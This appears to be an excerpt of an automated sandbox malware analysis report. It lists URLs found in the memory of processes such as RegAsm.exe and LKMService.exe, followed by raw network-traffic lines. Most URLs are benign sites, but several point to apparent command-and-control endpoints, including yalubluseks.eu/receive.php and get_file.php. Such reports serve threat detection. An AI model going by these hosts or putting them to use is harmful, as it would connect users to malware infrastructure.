Source: RegAsm.exe, 00000010.00000002.2705735289.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2117154587.000000000143B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: IIJDBG.30.dr	String found in binary or memory: https://support.mozilla.org
Source: IIJDBG.30.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IIJDBG.30.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2705735289.0000000001092000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2717841599.000000001BF7D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3100736562.0000000019B6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.0000000001269000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000044F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.0000000000465000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2939293622.000000001C08D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000044F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.0000000000465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: RegAsm.exe, 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000044F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: RegAsm.exe, 00000010.00000002.2677455575.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2705735289.0000000001092000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2717841599.000000001BF7D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3100736562.0000000019B6D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.0000000001269000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2939293622.000000001C08D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: RegAsm.exe, 00000010.00000002.2677455575.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: 9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://treatynreit.site/
Source: RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://treatynreit.site/api
Source: RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://treatynreit.site/apid;
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/e:
Source: RegAsm.exe, 0000000F.00000002.2325083864.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2553961645.0000000019FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: IIJDBG.30.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_filT6
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002833000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_file.php
Source: LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_file.phpT
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_updatX
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002833000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002711000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/get_update.php
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.00000000027BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/receive.php
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/receive.phpT
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.eu/t
Source: LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yalubluseks.euD

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
